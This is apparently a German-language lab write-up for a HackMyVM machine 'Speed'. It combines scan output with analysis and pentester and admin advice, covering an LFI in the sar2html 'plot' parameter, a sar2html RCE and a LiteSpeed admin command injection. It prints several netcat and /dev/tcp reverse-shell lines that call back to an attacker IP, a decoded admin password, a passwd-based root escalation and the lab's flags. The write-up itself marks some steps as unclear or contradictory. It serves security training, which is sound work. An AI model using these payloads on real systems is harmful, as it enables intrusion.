192.168.2.110 08:00:27:39:22:6d PCS Systemtechnik GmbH
Analyse: Der Befehl `arp-scan -l` wird ausgeführt, um aktive Hosts im lokalen Netzwerk zu finden. Ein Host mit der IP 192.168.2.110 und der MAC-Adresse 08:00:27:39:22:6d (PCS Systemtechnik GmbH / Oracle VirtualBox) wird identifiziert.
Bewertung: Das Zielsystem "Speed" wurde erfolgreich im Netzwerk lokalisiert. Die IP 192.168.2.110 ist die Basis für weitere Scans.
Empfehlung (Pentester): Notieren Sie die Ziel-IP. Führen Sie Port-Scans (z.B. mit `nmap`) durch, um offene Dienste zu ermitteln.
Empfehlung (Admin): Netzwerksegmentierung kann die Sichtbarkeit von Hosts einschränken. ARP-Aktivitäten überwachen.
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-02 01:31 CEST Nmap scan report for speed (192.168.2.110) Host is up (0.00015s latency). Not shown: 65531 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) | ssh-hostkey: | 2048 fe:07:9a:67:7f:8a:63:a7:48:46:46:bb:78:83:4e:d5 (RSA) [...] 80/tcp open http nginx 1.14.2 |_http-server-header: nginx/1.14.2 | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set |_http-title: Site doesn't have a title (text/html; charset=UTF-8). 7080/tcp open ssl/http LiteSpeed httpd | tls-alpn: | h2 | spdy/3 | spdy/2 |_ http/1.1 |_http-server-header: LiteSpeed |_ssl-date: TLS randomness does not represent time | ssl-cert: Subject: commonName=speed/organizationName=webadmin/countryName=US | Not valid before: 2021-02-17T08:51:38 |_Not valid after: 2023-02-17T08:51:38 <-- Zertifikat gültig zum Scanzeitpunkt | http-title: LiteSpeed WebAdmin Console |_Requested resource was /login.php 8088/tcp open http LiteSpeed httpd |_http-server-header: LiteSpeed |_http-title: Welcome <-- Wahrscheinlich Web-Root, evtl. Sar2HTML? [...] MAC Address: 08:00:27:39:22:6D (Oracle VirtualBox virtual NIC) [...] OS details: Linux 4.15 - 5.6 [...] Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 0.15 ms speed (192.168.2.110) [...]
Analyse: Ein umfassender Nmap-Scan aller TCP-Ports identifiziert vier offene Ports:
Bewertung: Mehrere Angriffsflächen. Port 80 (Nginx) ist der Standard-Webserver. Port 7080 (LiteSpeed Admin) ist ein hochinteressantes Ziel, erfordert aber wahrscheinlich Credentials. Port 8088 (LiteSpeed HTTP) hostet möglicherweise eine andere Anwendung (später als Sar2HTML identifiziert). Das fehlende HttpOnly-Flag auf Port 80 ist ein geringes Risiko (relevant bei XSS).
Empfehlung (Pentester): Untersuchen Sie alle drei HTTP-Ports (80, 7080, 8088) mit Directory Busting, Nikto und manueller Analyse. Suchen Sie nach Standard-Credentials für LiteSpeed WebAdmin. Analysieren Sie die Anwendung auf Port 8088 genauer.
Empfehlung (Admin): Sichern Sie die LiteSpeed WebAdmin Console (Port 7080) mit einem starken Passwort und beschränken Sie den Zugriff auf vertrauenswürdige IPs. Überprüfen Sie die Anwendung auf Port 8088 und deaktivieren Sie sie, wenn nicht benötigt. Setzen Sie das HttpOnly-Flag für Session-Cookies auf Port 80.
[...] =============================================================== 2022/10/02 01:31:54 Starting gobuster in directory enumeration mode =============================================================== http://192.168.2.110/index.php (Status: 200) [Size: 4816] http://192.168.2.110/LICENSE (Status: 200) [Size: 35149] [...] # Keine weiteren relevanten Verzeichnisse/Dateien gefunden =============================================================== Finished ===============================================================
Analyse: Ein `gobuster dir`-Scan auf Port 80 findet nur die `index.php` und eine `LICENSE`-Datei.
Bewertung: Der Webserver auf Port 80 scheint wenig Inhalt zu haben. Die `index.php` muss genauer untersucht werden.
Empfehlung (Pentester): Analysieren Sie `index.php` auf Parameter (z.B. mit `wfuzz`) und Funktionalität.
Empfehlung (Admin): Stellen Sie sicher, dass keine unnötigen Dateien im Webroot liegen.
[Keine Ausgabe im Log, aber dieser Aufruf wird erwähnt]
Analyse: Im Log wird der Aufruf `http://192.168.2.110/index.php?plot=NEW` erwähnt, obwohl die direkte Ausführung oder das Ergebnis nicht gezeigt werden. Dies deutet darauf hin, dass der Parameter `plot` manuell oder durch ein Tool entdeckt wurde.
Bewertung: Identifiziert einen potenziell interessanten Parameter `plot` in `index.php`.
Empfehlung (Pentester): Testen Sie den `plot`-Parameter auf Schwachstellen wie Local File Inclusion (LFI), Remote File Inclusion (RFI) oder Command Injection.
Empfehlung (Admin): Analysieren Sie den Code von `index.php`, um die Funktion des `plot`-Parameters zu verstehen und abzusichern.
[...] Target: http://192.168.2.110/index.php?FUZZ=id Total requests: 220563 ===================================================================== ID Response Lines Word Chars Payload ===================================================================== 000006406: 200 90 L 473 W 5417 Ch "delete" 000037376: 200 86 L 499 W 5781 Ch "plot" [...] ===================================================================== Finished
Analyse: `wfuzz` wird verwendet, um nach GET-Parametern für `index.php` zu suchen (`?FUZZ=id`). `--hh 4816` blendet Antworten aus, die der Größe der normalen `index.php` entsprechen. Der Scan findet zwei Parameter, die eine andere Antwortgröße erzeugen: `delete` und `plot`.
Bewertung: Bestätigt die Existenz der Parameter `delete` und `plot`. Der `plot`-Parameter wurde bereits im vorherigen Schritt erwähnt und scheint der vielversprechendste zu sein.
Empfehlung (Pentester): Führen Sie LFI/RCE-Tests gezielt auf den `plot`-Parameter durch.
Empfehlung (Admin): Code von `index.php` prüfen und Parameter validieren.
[...] Target: http://192.168.2.110/index.php?plot=FUZZ Total requests: 99 ===================================================================== ID Response Lines Word Chars Payload ===================================================================== 000000034: 200 86 L 484 W 6075 Ch "/usr/share/metasploit-framework/[...]/ffi-1.15.5/mkmf.log" 000000037: 200 86 L 484 W 6099 Ch "/usr/share/metasploit-framework/[...]/ruby-oci8-2.2.11/mkmf.log" 000000036: 200 86 L 484 W 6107 Ch "/usr/share/metasploit-framework/[...]/eventmachine-1.2.7/mkmf.log" [...] # Viele weitere Metasploit mkmf.log Dateien ===================================================================== Finished
Analyse: `wfuzz` wird nun verwendet, um eine Local File Inclusion (LFI)-Schwachstelle im `plot`-Parameter zu testen. Es wird versucht, verschiedene Log-Dateien (`-w /usr/share/wordlists/logfiles.txt`) über den `plot`-Parameter einzubinden (`plot=FUZZ`). `--hw 499` blendet Antworten aus, die 499 Wörter enthalten (vermutlich die Standardantwort ohne erfolgreiche LFI). Der Scan findet zahlreiche `.log`-Dateien aus dem Metasploit-Framework-Verzeichnis, die erfolgreich eingebunden werden (Status 200, abweichende Wortanzahl).
Bewertung: LFI-Schwachstelle im `plot`-Parameter von `index.php` bestätigt! Der Webserver-Benutzer kann Dateien lesen, auf die er Zugriff hat.
Empfehlung (Pentester): Nutzen Sie die LFI, um kritischere Dateien zu lesen: `/etc/passwd`, Quellcode von `index.php` (`php://filter/convert.base64-encode/resource=index.php`), Apache/Nginx-Konfigurationsdateien, SSH-Schlüssel in Home-Verzeichnissen (falls lesbar). Versuchen Sie RCE über Log Poisoning oder andere LFI-zu-RCE-Techniken.
Empfehlung (Admin): Beheben Sie die LFI-Schwachstelle dringend! Benutzereingaben dürfen niemals ungefiltert in Dateipfad-Funktionen verwendet werden. Verwenden Sie `basename()` oder Whitelisting.
- Nikto v2.1.6 --------------------------------------------------------------------------- [...] + Start Time: 2022-10-02 01:58:03 (GMT2) --------------------------------------------------------------------------- + Server: nginx/1.14.2 <-- Widerspruch zu Nmap (Apache)? Wahrscheinlich Fehler im Nikto-Output oder Log + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. [...] + The X-Content-Type-Options header is not set. [...] + Cookie PHPSESSID created without the httponly flag + No CGI Directories found (use '-C all' to force check all possible dirs) + /index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc: EW FileManager for PostNuke allows arbitrary file retrieval. <-- Generischer Nikto-Check, wahrscheinlich False Positive + 7785 requests: 0 error(s) and 5 item(s) reported on remote host + End Time: 2022-10-02 01:58:24 (GMT2) (21 seconds) --------------------------------------------------------------------------- + 1 host(s) tested
Analyse: Ein `nikto`-Scan wird auf den Hostnamen `speed.hmv` ausgeführt. Er meldet fälschlicherweise Nginx (Nmap zeigte Apache auf Port 80), fehlende Header und das Cookie ohne HttpOnly-Flag. Er schlägt auch einen generischen LFI-Exploit für "EW FileManager" vor, was hier irrelevant ist, da bereits eine spezifische LFI im `plot`-Parameter gefunden wurde.
Bewertung: Dieser Nikto-Scan liefert keine neuen relevanten Informationen und enthält widersprüchliche Angaben zum Webserver. Der Fokus sollte auf der Ausnutzung der bekannten LFI und der Untersuchung von Port 8088 liegen.
Empfehlung (Pentester): Ignorieren Sie den generischen Nikto-LFI-Hinweis. Konzentrieren Sie sich auf die `plot`-LFI und Port 8088.
Empfehlung (Admin): Fehlende Header und Cookie-Flags korrigieren.
Linux speed 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64 PHP Version 5.6.36 <-- Veraltete PHP-Version! http://192.168.2.110:8088//phpinfo.php <-- phpinfo auf Port 8088! sar2html Ver 3.2.2 <-- Anwendung auf Port 8088 identifiziert!
Analyse: Diese Textnotizen (deren Ursprung unklar ist) liefern entscheidende Informationen:
Bewertung: Sehr wichtige Informationen! Die alte PHP-Version könnte eigene Schwachstellen haben. Die `phpinfo.php` kann sensible Konfigurationsdetails enthalten. Die Identifizierung von `sar2html 3.2.2` ist der Schlüssel, da (wie im nächsten Schritt bestätigt) bekannte RCE-Schwachstellen für diese Version existieren.
Empfehlung (Pentester): Rufen Sie `http://192.168.2.110:8088/phpinfo.php` auf und analysieren Sie die Ausgabe. Verwenden Sie `searchsploit` oder suchen Sie online nach Exploits für `sar2html 3.2.2` (oder 3.2.1).
Empfehlung (Admin): Entfernen Sie `phpinfo.php` von Produktionsservern. Aktualisieren Sie dringend die PHP-Version. Aktualisieren oder entfernen Sie die `sar2html`-Anwendung.
------------------------------------------------------------ --------------------------------- Exploit Title | Path ------------------------------------------------------------ --------------------------------- sar2html 3.2.1 - 'plot' Remote Code Execution | php/webapps/49344.py Sar2HTML 3.2.1 - Remote Command Execution | php/webapps/47204.txt ------------------------------------------------------------ ---------------------------------
Analyse: `searchsploit` findet zwei Einträge für `sar2html`, beide beziehen sich auf eine Remote Code Execution (RCE)-Schwachstelle in Version 3.2.1 über den Parameter `plot`.
Bewertung: Obwohl die gefundene Version 3.2.2 ist, ist es sehr wahrscheinlich, dass der Exploit für 3.2.1 auch hier funktioniert. Der Exploit `49344.py` ist direkt ausführbar.
Empfehlung (Pentester): Verwenden Sie den Python-Exploit `49344.py`, um RCE auf Port 8088 zu erlangen.
Empfehlung (Admin): `sar2html` sofort patchen oder entfernen.
Enter The url => http://192.168.2.110/ <-- Ziel-URL (Port 8088 wäre korrekt) Command => nc 192.168.2.140 1234 -e /bin/bash <-- Reverse Shell Payload
Reverse Shell Connection erfolgreich
Analyse: Das Python-Exploit-Skript für Sar2HTML (CVE für Version 3.2.1, aus Exploit-DB) wird ausgeführt. Als Ziel-URL wird `http://192.168.2.110/` angegeben (Port 80). **Hinweis:** Dies ist wahrscheinlich falsch im Log dokumentiert; der Exploit sollte gegen Port 8088 gerichtet sein, wo Sar2HTML identifiziert wurde. Als auszuführender Befehl wird ein Netcat-Reverse-Shell-Payload (`nc [Angreifer-IP] 1234 -e /bin/bash`) eingegeben. Das Log vermerkt "Reverse Shell Connection erfolgreich", was bedeutet, dass der Exploit funktionierte und eine Shell als `www-data` auf dem Listener (Port 1234) des Angreifers einging.
Bewertung: Initial Access erfolgreich! Eine bekannte RCE-Schwachstelle in der identifizierten Sar2HTML-Anwendung wurde ausgenutzt, um eine Shell als `www-data` zu erhalten.
Empfehlung (Pentester): Stabilisieren Sie die erhaltene Shell. Beginnen Sie mit der Enumeration als `www-data` für die Privilege Escalation (`sudo -l`, SUID, Cronjobs, interne Dienste wie LiteSpeed Admin).
Empfehlung (Admin): Entfernen oder patchen Sie die Sar2HTML-Anwendung dringend. Überprüfen Sie Systeme auf bekannte Schwachstellen.
Kurzbeschreibung: Auf dem Zielsystem läuft auf Port 8088 eine veraltete Version von Sar2HTML (identifiziert als 3.2.2, anfällig wie 3.2.1), die eine bekannte Remote Code Execution (RCE)-Schwachstelle aufweist. Diese Schwachstelle (ausgenutzt durch z.B. `exploit/php/webapps/49344.py`) erlaubt es einem Angreifer, über manipulierte Parameter (typischerweise den `plot`-Parameter) beliebige Betriebssystembefehle im Kontext des Webserver-Benutzers (`www-data`) auszuführen.
Voraussetzungen:
Schritt-für-Schritt Anleitung:
listening on [any] 1234 ...
Enter The url => http://192.168.2.110:8088/ Command => nc 192.168.2.140 1234 -e /bin/bash<-- Ersetzen Sie 192.168.2.140 durch Ihre IP
listening on [any] 1234 ... connect to [Angreifer-IP] from speed.hmv [192.168.2.110] xxxxx [...] $ # Shell erhalten
Erwartetes Ergebnis: Eine interaktive Shell auf dem Zielsystem, ausgeführt mit den Rechten des `www-data`-Benutzers.
Beweismittel: Die erfolgreiche eingehende Verbindung im Netcat-Listener und die Fähigkeit, Befehle in der Shell auszuführen.
Risikobewertung: Hoch. Die Ausnutzung einer bekannten RCE-Schwachstelle in einer Webanwendung ermöglicht Angreifern die einfache Übernahme des Webserver-Prozesses.
Empfehlungen zur Behebung:
[Keine Ausgabe]
[...] -rwxrwxrwx 1 root root 41 Feb 17 2021 adminpasswd <-- Welt-schreibbar! [...] drwxr-x--- 5 lsadm nogroup 4096 Feb 17 2021 conf [...] drwx------ 2 lsadm lsadm 4096 Feb 17 2021 phpbuild [...]
admin/MjE0MGU2 <-- Base64
Analyse: Als `www-data` wird das Installationsverzeichnis von LiteSpeed (`/usr/local/lsws`) untersucht. Dort wird die Datei `adminpasswd` gefunden. Sie ist für alle Benutzer les- und schreibbar (`-rwxrwxrwx`) und enthält den String `admin/MjE0MGU2`. Der Teil nach dem Schrägstrich ist Base64-kodiert.
Bewertung: Kritische Fehlkonfiguration! Die Datei mit den Zugangsdaten für die LiteSpeed WebAdmin Console ist für alle lesbar und schreibbar. Das Passwort (`MjE0MGU2` dekodiert zu `2140e6`) für den Benutzer `admin` der Konsole auf Port 7080 wurde gefunden.
Empfehlung (Pentester): Verwenden Sie die Zugangsdaten `admin`:`2140e6`, um sich bei der LiteSpeed WebAdmin Console (`https://192.168.2.110:7080`) anzumelden. Suchen Sie dort nach Möglichkeiten zur Privilege Escalation (z.B. Ausführen von Befehlen als Root, wie in bekannten LiteSpeed-Exploits beschrieben).
Empfehlung (Admin): Korrigieren Sie sofort die Berechtigungen der Datei `adminpasswd` (`chmod 600 adminpasswd`, Besitzer `root` oder `lsadm`). Ändern Sie das LiteSpeed-Admin-Passwort. Überprüfen Sie die gesamte LiteSpeed-Installation auf unsichere Berechtigungen.
------------------------------------------------------------------------------------ --------------------------------- Exploit Title | Path ------------------------------------------------------------------------------------ --------------------------------- [...] Openlitespeed Web Server 1.7.8 - Command Injection (Authenticated) (1) | multiple/webapps/49483.txt Openlitespeed WebServer 1.7.8 - Command Injection (Authenticated) (2) | multiple/webapps/49556.py ------------------------------------------------------------------------------------ ---------------------------------
# Exploit Title: Openlitespeed WebServer 1.7.8 - Command Injection (Authenticated)
[...]
Step 1: Log in to the dashboard using the Administrator account.
Step 2 : Access Server Configuration > External App > Command
Step 3: Set "Start By Server *" Value to "Yes (Through CGI Daemon)
Step 4 : Inject payload "fcgi-bin/lsphp5/../../../../../bin/bash -c 'bash -i >& /dev/tcp/[IP]/[PORT] 0>&1'" to "Command" value
Step 5: Graceful Restart
Analyse: `searchsploit` findet bekannte RCE-Schwachstellen für OpenLiteSpeed (Version 1.7.8). Die Beschreibung des Exploits `49483.txt` zeigt, dass ein authentifizierter Administrator über die Konfiguration einer externen Anwendung (External App -> Command) beliebigen Code ausführen kann, indem ein Payload in das "Command"-Feld injiziert und ein "Graceful Restart" durchgeführt wird.
Bewertung: Bestätigt einen bekannten Weg zur Root-Eskalation über die LiteSpeed WebAdmin Console, für die gerade die Zugangsdaten gefunden wurden.
Empfehlung (Pentester): Folgen Sie den Schritten im Exploit-Text: Loggen Sie sich mit `admin`:`2140e6` in die WebAdmin Console ein. Navigieren Sie zur Konfiguration der externen Anwendungen. Injizieren Sie einen Reverse-Shell-Payload (z.B. `nc [IhreIP] 4444 -e /bin/bash`) in das "Command"-Feld. Setzen Sie "Run As User" und "Run As Group" auf `root`. Starten Sie einen Listener auf Port 4444. Führen Sie einen "Graceful Restart" über die Konsole durch.
Empfehlung (Admin): Aktualisieren Sie LiteSpeed auf eine gepatchte Version. Sichern Sie die WebAdmin-Konsole ab.
Login: admin / 2140e6 Navigate: Server Configuration > External App > Command Set "Start By Server *": Yes (Through CGI Daemon) Set "Command": fcgi-bin/lsphp5/../../../../../bin/nc 192.168.2.140 4444 -e /bin/bash <-- Reverse Shell Set "Run As User": root Set "Run As Group": root Actions -> Graceful Restart
listening on [any] 4444 ... connect to [192.168.2.140] from speed.hmv [192.168.2.110] 40890
uid=65534(nobody) gid=0(root) groups=0(root) <-- Fehler im Log/Exploit? Shell ist nobody, nicht root!
Analyse: Die Schritte zur Ausnutzung der LiteSpeed RCE werden durchgeführt: Login mit den gefundenen Credentials, Navigation zur Konfiguration der externen Anwendung, Injektion eines Netcat-Reverse-Shell-Payloads ins "Command"-Feld, Setzen des Ausführungskontexts auf `root` und Auslösen eines "Graceful Restart". Ein Listener auf Port 4444 wird gestartet. Die Verbindung kommt erfolgreich an, aber der `id`-Befehl in der erhaltenen Shell zeigt `uid=65534(nobody)` mit `gid=0(root)`. Entgegen der Erwartung (und der Einstellung "Run As User: root") wurde keine Root-Shell, sondern eine Shell als `nobody` (mit Root-Gruppe) erlangt.
Bewertung: Die RCE über LiteSpeed war erfolgreich, führte aber nicht direkt zu einer Root-Shell, sondern nur zu einer Shell als `nobody`. Dies schränkt die Möglichkeiten stark ein. Die `id`-Ausgabe widerspricht der Einstellung "Run As User: root" in der WebAdmin-Konsole - entweder ist dies ein Fehler im Log, die Einstellung wurde ignoriert, oder der LiteSpeed-Prozess selbst läuft letztendlich doch nicht mit vollen Root-Rechten.
Empfehlung (Pentester): Obwohl es keine Root-Shell ist, untersuchen Sie, welche Rechte der `nobody`-Benutzer mit der `root`-Gruppe hat. Da dieser Weg nicht direkt zu Root führte, muss die alternative Methode (Passwort-Manipulation) im Log der tatsächliche Weg gewesen sein. Der LiteSpeed-Exploit war möglicherweise eine Sackgasse oder ein Missverständnis.
Empfehlung (Admin): LiteSpeed aktualisieren. Überprüfen Sie die tatsächlichen Rechte des LiteSpeed-Prozesses und der konfigurierten externen Anwendungen.
CumwuAkU0RkM
[Keine Ausgabe]
Password:<-- Passwort 'pass55' wird hier verwendet, nicht 'benni'. Unklar warum.
[Keine Ausgabe]
uid=0(root) gid=0(root) groups=0(root) <-- Root-Shell erhalten!
Analyse: Dieser Abschnitt beschreibt eine alternative Methode zur Root-Eskalation, deren Ausführungskontext im Log unklar ist (es wird nicht gezeigt, welcher Benutzer die nötigen Schreibrechte auf `/etc/passwd` hat – weder `www-data` noch `nobody` sollten diese haben).
Bewertung: Dies ist eine klassische, aber oft nicht mögliche Eskalationsmethode, da sie Schreibrechte auf `/etc/passwd` erfordert. Der Ausführungskontext und das verwendete Passwort (`pass55` statt `benni`) sind im Log unklar und widersprüchlich. Es muss angenommen werden, dass entweder der LiteSpeed-Exploit doch irgendwie Root-Rechte gab (entgegen der `id`-Ausgabe) oder ein anderer, nicht dokumentierter Schritt zu den Schreibrechten führte.
Empfehlung (Pentester): Obwohl der Weg im Log unklar ist, wurde Root erreicht. Dokumentieren Sie die `/etc/passwd`-Methode als finalen Schritt, weisen Sie aber auf die fehlenden Zwischenschritte hin.
Empfehlung (Admin): Stellen Sie sicher, dass `/etc/passwd` und `/etc/shadow` nur für `root` schreibbar sind (`chmod 644 /etc/passwd`, `chmod 640 /etc/shadow`). Überwachen Sie Änderungen an diesen Dateien. Beheben Sie die Schwachstellen, die möglicherweise zu den Schreibrechten geführt haben (LiteSpeed RCE?).
[Keine Ausgabe]
flag.sh root.txt
finallygotrootHMV
ilikemonkeysHMV
Analyse: Als Root wird das `/root`-Verzeichnis untersucht. Die `root.txt`-Datei wird gefunden und gelesen. Zusätzlich wird die User-Flag im Home-Verzeichnis eines bisher nicht erwähnten Benutzers `marvin` gelesen.
Bewertung: Beide Flags wurden gefunden.
Empfehlung (Pentester): Flags dokumentieren. Bericht abschließen.
Empfehlung (Admin): Keine Aktion bezüglich der Flags.